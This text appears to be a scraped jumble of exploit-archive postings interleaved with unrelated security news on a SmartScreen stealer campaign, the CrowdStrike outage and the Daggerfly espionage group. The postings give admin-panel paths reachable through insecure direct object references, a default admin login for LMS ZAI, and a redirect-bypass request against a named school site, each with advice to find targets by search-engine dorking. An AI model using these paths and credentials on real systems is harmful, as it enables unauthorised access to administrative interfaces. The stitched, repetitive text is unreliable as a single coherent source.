Multi Store Inventory Management System version 1.0 suffers from an insecure direct object reference vulnerability.

**Multi Store Inventory Management System 1.0 Insecure Direct Object Reference**

Posted Jul 25, 2024

Authored by indoushka

Multi Store Inventory Management System version 1.0 suffers from an insecure direct object reference vulnerability.

tags | exploit

SHA-256 | 32be0fec962b67faf38d315a9d6d5a0c83204e2e599b0319b92fa81fc435926a

Download | Favorite | View

**Multi Store Inventory Management System 1.0 Insecure Direct Object Reference**

    ====================================================================================================================================| # Title     : Multi Store Inventory Management System v1.0 IDOR Vulnerability                                                    || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 125.0.1 (64 bits)                                                   || # Vendor    : https://www.campcodes.com/projects/php/complete-multi-store-inventory-management-system-in-php-mysql/              |====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] Insecure Direct Object Reference : suffers from an insecure direct object reference that allows users to access the administrative interface.[+] use payload : /dashboard/autoupdate[+] https://www/127.0.0.1/multistore_demo/dashboard/autoupdateGreetings to :==================================================jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R |================================================================

**File Tags**

*   ActiveX (933)
*   Advisory (86,131)
*   Arbitrary (16,828)
*   BBS (2,859)
*   Bypass (1,853)
*   CGI (1,033)
*   Code Execution (7,780)
*   Conference (691)
*   Cracker (844)
*   CSRF (3,380)
*   DoS (25,001)
*   Encryption (2,389)
*   Exploit (53,073)
*   File Inclusion (4,257)
*   File Upload (989)
*   Firewall (822)
*   Info Disclosure (2,876)
*   Intrusion Detection (914)
*   Java (3,141)
*   JavaScript (895)
*   Kernel (7,169)
*   Local (14,774)
*   Magazine (586)
*   Overflow (13,149)
*   Perl (1,435)
*   PHP (5,220)
*   Proof of Concept (2,381)
*   Protocol (3,723)
*   Python (1,630)
*   Remote (31,616)
*   Root (3,625)
*   Rootkit (526)
*   Ruby (631)
*   Scanner (1,657)
*   Security Tool (8,023)
*   Shell (3,272)
*   Shellcode (1,217)
*   Sniffer (902)
*   Spoof (2,271)
*   SQL Injection (16,588)
*   TCP (2,440)
*   Trojan (690)
*   UDP (901)
*   Virus (669)
*   Vulnerability (32,903)
*   Web (9,949)
*   Whitepaper (3,781)
*   x86 (967)
*   XSS (18,236)
*   Other

**File Archives**

*   July 2024
*   June 2024
*   May 2024
*   April 2024
*   March 2024
*   February 2024
*   January 2024
*   December 2023
*   November 2023
*   October 2023
*   September 2023
*   August 2023
*   Older

**Systems**

*   AIX (429)
*   Apple (2,090)
*   BSD (377)
*   CentOS (58)
*   Cisco (1,927)
*   Debian (7,082)
*   Fedora (1,693)
*   FreeBSD (1,246)
*   Gentoo (4,534)
*   HPUX (880)
*   iOS (376)
*   iPhone (108)
*   IRIX (220)
*   Juniper (69)
*   Linux (50,527)
*   Mac OS X (691)
*   Mandriva (3,105)
*   NetBSD (256)
*   OpenBSD (489)
*   RedHat (16,402)
*   Slackware (941)
*   Solaris (1,611)
*   SUSE (1,444)
*   Ubuntu (9,689)
*   UNIX (9,431)
*   UnixWare (187)
*   Windows (6,667)
*   Other

Multi Store Inventory Management System 1.0 Insecure Direct Object Reference

The good news: Only organizations far behind on standard Windows patching have anything to worry about.

Source: dennizn via Alamy Stock Photo

A Microsoft Defender SmartScreen vulnerability that was patched in February is still being used in infostealing attacks across the globe.

CVE-2024-21412 — a "high" severity, 8.1 CVSS-scored security bypass bug in SmartScreen — was first disclosed and fixed on Feb. 13. Since then, it has been used in campaigns involving well-known infostealers like Lumma Stealer, Water Hydra, and DarkGate.

Now, five months later, Fortinet has flagged yet another campaign involving two more stealers: Meduza and ACR. Attacks thus far have reached the US, Spain, and Thailand.

Sometimes, organizations take their time updating third-party software. By contrast, "The attackers in this case are taking advantage of software that's native on Microsoft Windows, which would be updated in normal Microsoft patch cycles," notes Aamir Lakhani, global security strategist and researcher at Fortinet. "It's a little unclear and concerning when these vulnerabilities are not patched, because it could indicate there are other Microsoft vulnerabilities that are not being patched as well."

**A CVE-2024-21412 Attack Chain**

If you visit a website, or download a file or program that's known to be unsafe — or is suspicious for any number of other reasons — SmartScreen will step in and present you with that famous blue screen message: "Windows protected your PC." It's a simple, effective way to alert users to potentially dangerous cyber threats.

So consider how useful it would be to an attacker if they could simply disable that notification. This is what CVE-2024-21412 allows them to do.

In the latest campaign identified by Fortinet, the attackers are beating SmartScreen "through the combination of PowerShell trickery and hiding attacks in images and taking advantage of how those images are processed," Lakhani explains.

First, they lure victims with a URL that triggers the download of a shortcut (LNK) file. The LNK downloads an executable with an HTML Application (HTA) script with PowerShell code for retrieving decoy PDF files and malicious code injectors.

One of the injectors is more interesting than the other. After running anti-debugging checks, it downloads a JPG image file, then uses a Windows API to access its pixels and decode its bytes, wherein lies malicious code.

"These types of image-based attacks have been around a long time and, while they aren't as common as other types of attacks we typically observe, we still see them pop up over time because they are quite effective," Lakhani notes. "It's not surprising to see this attack, especially because \[steganography\] detection is often overlooked compared to other attack scenarios."

**Consequences to the Unpatched**

The stealers smuggled in through image files in this case get planted inside of legitimate Windows processes, at which point the gathering and exfiltration of data begins.

The kinds of information they aim for are broad. ACR, for example, steals from dozens of browsers (Google Chrome, Firefox), dozens of crypto wallets (Binance, Ledger Live), messenger apps (Telegram, WhatsApp), password managers (Bitwarden, 1Password), virtual private network (VPN) apps, email clients, file transfer protocol (FTP) clients, and more. 

Only organizations far behind on standard Windows patching have anything to worry about. Clearly, though, those organizations are out there.

"I would understand how individual software updates from smaller companies may be missed, but most organizations have regular Microsoft software patch updates, and this particular vulnerability remains open to attack," Lakhani says. To encourage better patching practices, he adds, "I think in all cases, software vendors need to give users alerts and notifications that critical security patches exist and should be installed when the software is launched or used."

**About the Author(s)**

Nate Nelson is a freelance writer based in New York City. Formerly a reporter at Threatpost, he contributes to a number of cybersecurity blogs and podcasts. He writes "Malicious Life" -- an award-winning Top 20 tech podcast on Apple and Spotify -- and hosts every other episode, featuring interviews with leading voices in security. He also co-hosts "The Industrial Security Podcast," the most popular show in its field.

Cyberattackers Exploit Microsoft SmartScreen Bug in Stealer Campaign

SIM Wisuda version 1.0 suffers from an insecure direct object reference vulnerability.

**SIM Wisuda 1.0 Insecure Direct Object Reference**

Posted Jul 24, 2024

Authored by indoushka

SIM Wisuda version 1.0 suffers from an insecure direct object reference vulnerability.

tags | exploit

SHA-256 | 7fed84c74a95aca63927ebf377895e9a07606b145886012809d45f932101a348

Download | Favorite | View

**SIM Wisuda 1.0 Insecure Direct Object Reference**

    ====================================================================================================================================| # Title     : SIM Wisuda v1.0 IDOR Vulnerability                                                                                 || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 125.0.1 (64 bits)                                                   || # Vendor    : https://academic.uii.ac.id/wisuda/                                                                                 |====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] Insecure Direct Object Reference : suffers from an insecure direct object reference that allows users to access the administrative interface.[+] use payload : /login/apps/?menu=Lulusan[+] https://www/127.0.0.1/wisuda.uika-bogor.ac.id/login/apps/?menu=LulusanGreetings to :==================================================jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R |================================================================

**File Tags**

*   ActiveX (933)
*   Advisory (86,109)
*   Arbitrary (16,828)
*   BBS (2,859)
*   Bypass (1,853)
*   CGI (1,033)
*   Code Execution (7,779)
*   Conference (691)
*   Cracker (844)
*   CSRF (3,380)
*   DoS (24,997)
*   Encryption (2,389)
*   Exploit (53,065)
*   File Inclusion (4,257)
*   File Upload (989)
*   Firewall (822)
*   Info Disclosure (2,876)
*   Intrusion Detection (914)
*   Java (3,141)
*   JavaScript (895)
*   Kernel (7,167)
*   Local (14,774)
*   Magazine (586)
*   Overflow (13,149)
*   Perl (1,435)
*   PHP (5,220)
*   Proof of Concept (2,381)
*   Protocol (3,723)
*   Python (1,630)
*   Remote (31,613)
*   Root (3,625)
*   Rootkit (525)
*   Ruby (631)
*   Scanner (1,657)
*   Security Tool (8,022)
*   Shell (3,271)
*   Shellcode (1,217)
*   Sniffer (902)
*   Spoof (2,271)
*   SQL Injection (16,588)
*   TCP (2,440)
*   Trojan (690)
*   UDP (901)
*   Virus (669)
*   Vulnerability (32,900)
*   Web (9,947)
*   Whitepaper (3,781)
*   x86 (967)
*   XSS (18,236)
*   Other

**File Archives**

*   July 2024
*   June 2024
*   May 2024
*   April 2024
*   March 2024
*   February 2024
*   January 2024
*   December 2023
*   November 2023
*   October 2023
*   September 2023
*   August 2023
*   Older

**Systems**

*   AIX (429)
*   Apple (2,090)
*   BSD (377)
*   CentOS (58)
*   Cisco (1,927)
*   Debian (7,082)
*   Fedora (1,693)
*   FreeBSD (1,246)
*   Gentoo (4,534)
*   HPUX (880)
*   iOS (376)
*   iPhone (108)
*   IRIX (220)
*   Juniper (69)
*   Linux (50,505)
*   Mac OS X (691)
*   Mandriva (3,105)
*   NetBSD (256)
*   OpenBSD (489)
*   RedHat (16,383)
*   Slackware (941)
*   Solaris (1,611)
*   SUSE (1,444)
*   Ubuntu (9,686)
*   UNIX (9,430)
*   UnixWare (187)
*   Windows (6,667)
*   Other

SIM Wisuda 1.0 Insecure Direct Object Reference

Webdenim AppUI version 1.0 suffers from an insecure direct object reference vulnerability.

**Webdenim AppUI 1.0 Insecure Direct Object Reference**

Posted Jul 24, 2024

Authored by indoushka

Webdenim AppUI version 1.0 suffers from an insecure direct object reference vulnerability.

tags | exploit

SHA-256 | 3418251e6b23a29fe38369d103a67d4c4c7e084f78a767a8b4660ce397493457

Download | Favorite | View

**Webdenim AppUI 1.0 Insecure Direct Object Reference**

    ====================================================================================================================================| # Title     : Webdenim AppUI v1.0 IDOR Vulnerability                                                                             || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 125.0.1 (64 bits)                                                   || # Vendor    : https://codentheme.com/item/appui-free-responsive-html-vuejs-angularjs-admin-dashboard/                            |====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] Insecure Direct Object Reference : suffers from an insecure direct object reference that allows users to access the administrative interface.[+] use payload : //admin/header.php[+] https://www/127.0.0.1/listandrelaxcom/admin/header.phpGreetings to :==================================================jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R |================================================================

**File Tags**

*   ActiveX (933)
*   Advisory (86,109)
*   Arbitrary (16,828)
*   BBS (2,859)
*   Bypass (1,853)
*   CGI (1,033)
*   Code Execution (7,779)
*   Conference (691)
*   Cracker (844)
*   CSRF (3,380)
*   DoS (24,997)
*   Encryption (2,389)
*   Exploit (53,065)
*   File Inclusion (4,257)
*   File Upload (989)
*   Firewall (822)
*   Info Disclosure (2,876)
*   Intrusion Detection (914)
*   Java (3,141)
*   JavaScript (895)
*   Kernel (7,167)
*   Local (14,774)
*   Magazine (586)
*   Overflow (13,149)
*   Perl (1,435)
*   PHP (5,220)
*   Proof of Concept (2,381)
*   Protocol (3,723)
*   Python (1,630)
*   Remote (31,613)
*   Root (3,625)
*   Rootkit (525)
*   Ruby (631)
*   Scanner (1,657)
*   Security Tool (8,022)
*   Shell (3,271)
*   Shellcode (1,217)
*   Sniffer (902)
*   Spoof (2,271)
*   SQL Injection (16,588)
*   TCP (2,440)
*   Trojan (690)
*   UDP (901)
*   Virus (669)
*   Vulnerability (32,900)
*   Web (9,947)
*   Whitepaper (3,781)
*   x86 (967)
*   XSS (18,236)
*   Other

**File Archives**

*   July 2024
*   June 2024
*   May 2024
*   April 2024
*   March 2024
*   February 2024
*   January 2024
*   December 2023
*   November 2023
*   October 2023
*   September 2023
*   August 2023
*   Older

**Systems**

*   AIX (429)
*   Apple (2,090)
*   BSD (377)
*   CentOS (58)
*   Cisco (1,927)
*   Debian (7,082)
*   Fedora (1,693)
*   FreeBSD (1,246)
*   Gentoo (4,534)
*   HPUX (880)
*   iOS (376)
*   iPhone (108)
*   IRIX (220)
*   Juniper (69)
*   Linux (50,505)
*   Mac OS X (691)
*   Mandriva (3,105)
*   NetBSD (256)
*   OpenBSD (489)
*   RedHat (16,383)
*   Slackware (941)
*   Solaris (1,611)
*   SUSE (1,444)
*   Ubuntu (9,686)
*   UNIX (9,430)
*   UnixWare (187)
*   Windows (6,667)
*   Other

Webdenim AppUI 1.0 Insecure Direct Object Reference

Cybersecurity firm CrowdStrike on Wednesday blamed an issue in its validation system for causing millions of Windows devices to crash as part of a widespread outage late last week.
"On Friday, July 19, 2024 at 04:09 UTC, as part of regular operations, CrowdStrike released a content configuration update for the Windows sensor to gather telemetry on possible novel threat techniques," the company

Software Update / IT Outage

Cybersecurity firm CrowdStrike on Wednesday blamed an issue in its validation system for causing millions of Windows devices to crash as part of a widespread outage late last week.

"On Friday, July 19, 2024 at 04:09 UTC, as part of regular operations, CrowdStrike released a content configuration update for the Windows sensor to gather telemetry on possible novel threat techniques," the company said in its Preliminary Post Incident Review (PIR).

"These updates are a regular part of the dynamic protection mechanisms of the Falcon platform. The problematic Rapid Response Content configuration update resulted in a Windows system crash."

The incident impacted Windows hosts running sensor version 7.11 and above that was online between July 19, 2024, 04:09 UTC and 05:27 UTC and received the update. Apple macOS and Linux systems were not affected.

CrowdStrike said it delivers security content configuration updates in two ways, one via Sensor Content that's shipped with Falcon Sensor and another through Rapid Response Content that allows it to flag novel threats using various behavioral pattern-matching techniques.

The crash is said to have been the result of a Rapid Response Content update containing a previously undetected error. It's worth noting that such updates are delivered in the form of Template Instances corresponding to specific behaviors – that are mapped to specific Template Types – for enabling new telemetry and detection.

The Template Instances, in turn, are created using a Content Configuration System, after which they are deployed to the sensor over the cloud through a mechanism dubbed Channel Files, which are ultimately written to disk on the Windows machine. The system also encompasses a Content Validator component that carries out validation checks on the content before it is published.

"Rapid Response Content provides visibility and detections on the sensor without requiring sensor code changes," it explained.

"This capability is used by threat detection engineers to gather telemetry, identify indicators of adversary behavior and perform detections and preventions. Rapid Response Content is behavioral heuristics, separate and distinct from CrowdStrike's on-sensor AI prevention and detection capabilities."

These updates are then parsed by the Falcon sensor's Content Interpreter, which then facilitates the Sensor Detection Engine to detect or prevent malicious activity.

While each new Template Type is stress tested for different parameters like resource utilization and performance impact, the root cause of the problem, per CrowdStrike, could be traced back to the rollout of the Interprocess Communication (IPC) Template Type on February 28, 2024, that was introduced to flag attacks that named pipes.

The timeline of events is as follows -

*   **February 28, 2024** - CrowdStrike releases sensor 7.11 to customers with new IPC Template Type
*   **March 5, 2024** - The IPC Template Type passes the stress test and is validated for use
*   **March 5, 2024** - The IPC Template Instance is released to production via Channel File 291
*   **April 8 - 24, 2024** - Three more IPC Template Instances are deployed in production
*   **July 19, 2024** - Two additional IPC Template Instances are deployed, one of which passes validation despite having problematic content data

"Based on the testing performed before the initial deployment of the Template Type (on March 05, 2024), trust in the checks performed in the Content Validator, and previous successful IPC Template Instance deployments, these instances were deployed into production," CrowdStrike said.

"When received by the sensor and loaded into the Content Interpreter, problematic content in Channel File 291 resulted in an out-of-bounds memory read triggering an exception. This unexpected exception could not be gracefully handled, resulting in a Windows operating system crash (BSoD)."

In response to the sweeping disruptions caused by the crash and preventing them from happening again, the Texas-based company said it has improved its testing processes and enhanced its error handling mechanism in the Content Interpreter. It's also planning to implement a staggered deployment strategy for Rapid Response Content.

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

CrowdStrike Explains Friday Incident Crashing Millions of Windows Devices

Organizations in Taiwan and a U.S. non-governmental organization (NGO) based in China have been targeted by a Beijing-affiliated state-sponsored hacking group called Daggerfly using an upgraded set of malware tools.
The campaign is a sign that the group "also engages in internal espionage," Symantec's Threat Hunter Team, part of Broadcom, said in a new report published today. "In the attack on

Cyber Espionage / Chinese Hackers

Organizations in Taiwan and a U.S. non-governmental organization (NGO) based in China have been targeted by a Beijing-affiliated state-sponsored hacking group called **Daggerfly** using an upgraded set of malware tools.

The campaign is a sign that the group "also engages in internal espionage," Symantec's Threat Hunter Team, part of Broadcom, said in a new report published today. "In the attack on this organization, the attackers exploited a vulnerability in an Apache HTTP server to deliver their MgBot malware."

Daggerfly, also known by the names Bronze Highland and Evasive Panda, was previously observed using the MgBot modular malware framework in connection with an intelligence-gathering mission aimed at telecom service providers in Africa. It's known to be operational since 2012.

"Daggerfly appears to be capable of responding to exposure by quickly updating its toolset to continue its espionage activities with minimal disruption," the company noted.

The latest set of attacks are characterized by the use of a new malware family based on MgBot as well as an improved version of a known Apple macOS malware called MACMA, which was first exposed by Google's Threat Analysis Group (TAG) in November 2021 as distributed via watering hole attacks targeting internet users in Hong Kong by abusing security flaws in the Safari browser.

The development marks the first time the malware strain, which is capable of harvesting sensitive information and executing arbitrary commands, has been explicitly linked to a particular hacking group.

"The actors behind macOS.MACMA at least were reusing code from ELF/Android developers and possibly could have also been targeting Android phones with malware as well," SentinelOne noted in a subsequent analysis at the time.

MACMA's connections to Daggerly also stem from source code overlaps between the malware and Mgbot, and the fact that it connects to a command-and-control (C2) server (103.243.212\[.\]98) that has also been used by a MgBot dropper.

Another new malware in its arsenal is Nightdoor (aka NetMM and Suzafk), an implant that uses Google Drive API for C2 and has been utilized in watering hole attacks aimed at Tibetan users since at least September 2023. Details of the activity were first documented by ESET earlier this March.

"The group can create versions of its tools targeting most major operating system platform," Symantec said, adding it has "seen evidence of the ability to trojanize Android APKs, SMS interception tools, DNS request interception tools, and even malware families targeting Solaris OS."

The development comes as China's National Computer Virus Emergency Response Center (CVERC) claimed Volt Typhoon – which has been attributed by the Five Eyes nations as a China-nexus espionage group – to be an invention of the U.S. intelligence agencies, describing it as a misinformation campaign.

"Although its main targets are U.S. congress and American people, it also attempt\[s\] to defame China, sow discords \[sic\] between China and other countries, contain China's development, and rob Chinese companies," the CVERC asserted in a recent report.

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

Chinese Hackers Target Taiwan and US NGO with MgBot Malware

LMS ZAI version 6.1 suffers from an ignored default credential vulnerability.

**LMS ZAI 6.1 Insecure Settings**

Posted Jul 23, 2024

Authored by indoushka

LMS ZAI version 6.1 suffers from an ignored default credential vulnerability.

tags | exploit

SHA-256 | ac6f91ffe20c571e57ac0c8a6aef0c5437b2d37e5f53c46ef41059f24100b7db

Download | Favorite | View

**LMS ZAI 6.1 Insecure Settings**

    ====================================================================================================================================| # Title     : LMS ZAI v6.1 Insecure Settings Vulnerability                                                                       || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 125.0.1 (64 bits)                                                   || # Vendor    : https://codecanyon.net/item/lmszai-learning-management-system/38383087                                             |====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] Insecure Settings : appears to leave a default administrative account in place post installation.[+] use payload : user =  admin@gmail.com & pass = 123456[+] https://www/127.0.0.1/www.mylmsin/admin/dashboardGreetings to :==================================================jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R |================================================================

**File Tags**

*   ActiveX (933)
*   Advisory (86,069)
*   Arbitrary (16,824)
*   BBS (2,859)
*   Bypass (1,852)
*   CGI (1,033)
*   Code Execution (7,777)
*   Conference (691)
*   Cracker (844)
*   CSRF (3,380)
*   DoS (24,989)
*   Encryption (2,389)
*   Exploit (53,058)
*   File Inclusion (4,257)
*   File Upload (989)
*   Firewall (822)
*   Info Disclosure (2,876)
*   Intrusion Detection (914)
*   Java (3,141)
*   JavaScript (895)
*   Kernel (7,164)
*   Local (14,773)
*   Magazine (586)
*   Overflow (13,148)
*   Perl (1,435)
*   PHP (5,220)
*   Proof of Concept (2,381)
*   Protocol (3,723)
*   Python (1,629)
*   Remote (31,604)
*   Root (3,625)
*   Rootkit (525)
*   Ruby (631)
*   Scanner (1,657)
*   Security Tool (8,022)
*   Shell (3,270)
*   Shellcode (1,217)
*   Sniffer (902)
*   Spoof (2,271)
*   SQL Injection (16,585)
*   TCP (2,439)
*   Trojan (690)
*   UDP (901)
*   Virus (669)
*   Vulnerability (32,895)
*   Web (9,947)
*   Whitepaper (3,781)
*   x86 (967)
*   XSS (18,236)
*   Other

**File Archives**

*   July 2024
*   June 2024
*   May 2024
*   April 2024
*   March 2024
*   February 2024
*   January 2024
*   December 2023
*   November 2023
*   October 2023
*   September 2023
*   August 2023
*   Older

**Systems**

*   AIX (429)
*   Apple (2,090)
*   BSD (377)
*   CentOS (58)
*   Cisco (1,927)
*   Debian (7,082)
*   Fedora (1,693)
*   FreeBSD (1,246)
*   Gentoo (4,531)
*   HPUX (880)
*   iOS (376)
*   iPhone (108)
*   IRIX (220)
*   Juniper (69)
*   Linux (50,465)
*   Mac OS X (691)
*   Mandriva (3,105)
*   NetBSD (256)
*   OpenBSD (489)
*   RedHat (16,354)
*   Slackware (941)
*   Solaris (1,611)
*   SUSE (1,444)
*   Ubuntu (9,678)
*   UNIX (9,430)
*   UnixWare (187)
*   Windows (6,667)
*   Other

LMS ZAI 6.1 Insecure Settings

Quick Job version 2.4 suffers from an insecure direct object reference vulnerability.

**Quick Job 2.4 Insecure Direct Object Reference**

Posted Jul 23, 2024

Authored by indoushka

Quick Job version 2.4 suffers from an insecure direct object reference vulnerability.

tags | exploit

SHA-256 | ed619defcb18f94880d7fdc150758b05fc052d89b88cf6c32eda99ac714a326b

Download | Favorite | View

**Quick Job 2.4 Insecure Direct Object Reference**

    ====================================================================================================================================| # Title     : Quick Job v2.4 IDOR Vulnerability                                                                                  || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 125.0.1 (64 bits)                                                   || # Vendor    : https://bylancer.com/demo/quickjob/                                                                                |====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] Insecure Direct Object Reference : suffers from an insecure direct object reference that allows users to access the administrative interface.[+] use payload : //admin/header.php[+] https://www/127.0.0.1/newjobcartcom/admin/header.phpGreetings to :==================================================jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R |================================================================

**File Tags**

*   ActiveX (933)
*   Advisory (86,069)
*   Arbitrary (16,824)
*   BBS (2,859)
*   Bypass (1,852)
*   CGI (1,033)
*   Code Execution (7,777)
*   Conference (691)
*   Cracker (844)
*   CSRF (3,380)
*   DoS (24,989)
*   Encryption (2,389)
*   Exploit (53,058)
*   File Inclusion (4,257)
*   File Upload (989)
*   Firewall (822)
*   Info Disclosure (2,876)
*   Intrusion Detection (914)
*   Java (3,141)
*   JavaScript (895)
*   Kernel (7,164)
*   Local (14,773)
*   Magazine (586)
*   Overflow (13,148)
*   Perl (1,435)
*   PHP (5,220)
*   Proof of Concept (2,381)
*   Protocol (3,723)
*   Python (1,629)
*   Remote (31,604)
*   Root (3,625)
*   Rootkit (525)
*   Ruby (631)
*   Scanner (1,657)
*   Security Tool (8,022)
*   Shell (3,270)
*   Shellcode (1,217)
*   Sniffer (902)
*   Spoof (2,271)
*   SQL Injection (16,585)
*   TCP (2,439)
*   Trojan (690)
*   UDP (901)
*   Virus (669)
*   Vulnerability (32,895)
*   Web (9,947)
*   Whitepaper (3,781)
*   x86 (967)
*   XSS (18,236)
*   Other

**File Archives**

*   July 2024
*   June 2024
*   May 2024
*   April 2024
*   March 2024
*   February 2024
*   January 2024
*   December 2023
*   November 2023
*   October 2023
*   September 2023
*   August 2023
*   Older

**Systems**

*   AIX (429)
*   Apple (2,090)
*   BSD (377)
*   CentOS (58)
*   Cisco (1,927)
*   Debian (7,082)
*   Fedora (1,693)
*   FreeBSD (1,246)
*   Gentoo (4,531)
*   HPUX (880)
*   iOS (376)
*   iPhone (108)
*   IRIX (220)
*   Juniper (69)
*   Linux (50,465)
*   Mac OS X (691)
*   Mandriva (3,105)
*   NetBSD (256)
*   OpenBSD (489)
*   RedHat (16,354)
*   Slackware (941)
*   Solaris (1,611)
*   SUSE (1,444)
*   Ubuntu (9,678)
*   UNIX (9,430)
*   UnixWare (187)
*   Windows (6,667)
*   Other

Quick Job 2.4 Insecure Direct Object Reference

PPDB ONLINE version 1.3 appears to suffer from an administrative page disclosure issue.

====================================================================================================================================  
| # Title     : PPDB ONLINE V.1.3  HTML Form in redirect page Vulnerability                                                        |  
| # Author    : indoushka                                                                                                          |  
| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 125.0.1 (64 bits)                                                   |  
| # Vendor    : https://berkas.siap-ppdb.com/                                                                                      |  
====================================================================================================================================

poc :

[+] Dorking İn Google Or Other Search Enggine.

[+] Vulnerability description :

An HTML form was found in the response body of this page. However, the current page redirects the visitor to another page by returning an HTTP status code of 301/302.  
 Therefore, all browser users will not see the contents of this page and will not be able to interact with the HTML form. 

Sometimes programmers don't properly terminate the script after redirecting the user to another page. For example:   
<?php  
    if (!isset($_SESSION["authenticated"])) {  
        header("Location: auth.php");  
    }  
?>  
<title>Administration page</title>  
<form action="/admin/action" method="post">  
      
</form>

    
This script is incorrect because the script is not terminated after the "header("Location: auth.php");" line. An attacker can access the content the administration page by using an HTTP client that doesn't follow redirection (like HTTP Editor). This creates an authentication bypass vulnerability.   
The correct code would be 

<?php  
    if (!isset($_SESSION[auth])) {  
        header("Location: auth.php");  
        exit();  
    }  
?>  
<title>Administration page</title>  
<form action="/admin/action" method="post">  
      
</form>

    

[+] infected item : /pass. 

[+] Attack details :

Form action=''

GET /pass/ HTTP/1.1  
Pragma: no-cache  
Cache-Control: no-cache  
Referer: https://127.0.0.1/elearning7.smpn49-jkt.sch.id/pass  
Acunetix-Aspect: enabled  
Acunetix-Aspect-Password: 082119f75623eb7abd7bf357698ff66c  
Acunetix-Aspect-Queries: filelist;aspectalerts  
Cookie: PHPSESSID=dc1a2974e1afffa5b1926d0e4f3ff57f  
Host: elearning7.smpn49-jkt.sch.id  
Connection: Keep-alive  
Accept-Encoding: gzip,deflate  
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21  
Accept: */*

Response  
HTTP/1.1 302 Found  
Connection: Keep-Alive  
Keep-Alive: timeout=5, max=100  
x-powered-by: PHP/7.3.33  
location: https://127.0.0.1/elearning7.smpn49-jkt.sch.id/login.php  
content-type: text/html; charset=UTF-8  
content-length: 16992  
vary: Accept-Encoding,User-Agent  
date: Fri, 19 Jul 2024 10:09:49 GMT  
server: LiteSpeed  
cache-control: no-cache, no-store, must-revalidate, max-age=0  
platform: hostinger  
strict-transport-security: max-age=31536000; includeSubDomains; preload  
x-xss-protection: 1; mode=block  
x-content-type-options: nosniff  
Original-Content-Encoding: gzip

[+] The impact of this vulnerability : depends on the affected web application.

[+] How to fix this vulnerability : Make sure the script is terminated after redirecting the user to another page

Greetings to :==================================================  
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R |  
================================================================

PPDB ONLINE 1.3 Administrative Page Disclosure

eDesign CMS version 2.0 suffers from an insecure direct object reference vulnerability.

**eDesign CMS 2.0 Insecure Direct Object Reference**

Posted Jul 23, 2024

Authored by indoushka

eDesign CMS version 2.0 suffers from an insecure direct object reference vulnerability.

tags | exploit

SHA-256 | 55a4eca00e7267d8d4d5cdd94c2b99447eef8059c06cab914a3401ebda7966f2

Download | Favorite | View

**eDesign CMS 2.0 Insecure Direct Object Reference**

    ====================================================================================================================================| # Title     : eDesign CMS v2.0 IDOR Vulnerability                                                                                || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 125.0.1 (64 bits)                                                   || # Vendor    : http://gico.io/agop/demos/                                                                                         |====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] Insecure Direct Object Reference : suffers from an insecure direct object reference that allows users to access the administrative interface.[+] use payload : /admin/register[+] https://www/127.0.0.1/yenpresscom/admin/registerGreetings to :==================================================jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R |================================================================

**File Tags**

*   ActiveX (933)
*   Advisory (86,069)
*   Arbitrary (16,824)
*   BBS (2,859)
*   Bypass (1,852)
*   CGI (1,033)
*   Code Execution (7,777)
*   Conference (691)
*   Cracker (844)
*   CSRF (3,380)
*   DoS (24,989)
*   Encryption (2,389)
*   Exploit (53,058)
*   File Inclusion (4,257)
*   File Upload (989)
*   Firewall (822)
*   Info Disclosure (2,876)
*   Intrusion Detection (914)
*   Java (3,141)
*   JavaScript (895)
*   Kernel (7,164)
*   Local (14,773)
*   Magazine (586)
*   Overflow (13,148)
*   Perl (1,435)
*   PHP (5,220)
*   Proof of Concept (2,381)
*   Protocol (3,723)
*   Python (1,629)
*   Remote (31,604)
*   Root (3,625)
*   Rootkit (525)
*   Ruby (631)
*   Scanner (1,657)
*   Security Tool (8,022)
*   Shell (3,270)
*   Shellcode (1,217)
*   Sniffer (902)
*   Spoof (2,271)
*   SQL Injection (16,585)
*   TCP (2,439)
*   Trojan (690)
*   UDP (901)
*   Virus (669)
*   Vulnerability (32,895)
*   Web (9,947)
*   Whitepaper (3,781)
*   x86 (967)
*   XSS (18,236)
*   Other

**File Archives**

*   July 2024
*   June 2024
*   May 2024
*   April 2024
*   March 2024
*   February 2024
*   January 2024
*   December 2023
*   November 2023
*   October 2023
*   September 2023
*   August 2023
*   Older

**Systems**

*   AIX (429)
*   Apple (2,090)
*   BSD (377)
*   CentOS (58)
*   Cisco (1,927)
*   Debian (7,082)
*   Fedora (1,693)
*   FreeBSD (1,246)
*   Gentoo (4,531)
*   HPUX (880)
*   iOS (376)
*   iPhone (108)
*   IRIX (220)
*   Juniper (69)
*   Linux (50,465)
*   Mac OS X (691)
*   Mandriva (3,105)
*   NetBSD (256)
*   OpenBSD (489)
*   RedHat (16,354)
*   Slackware (941)
*   Solaris (1,611)
*   SUSE (1,444)
*   Ubuntu (9,678)
*   UNIX (9,430)
*   UnixWare (187)
*   Windows (6,667)
*   Other

Tag

#apple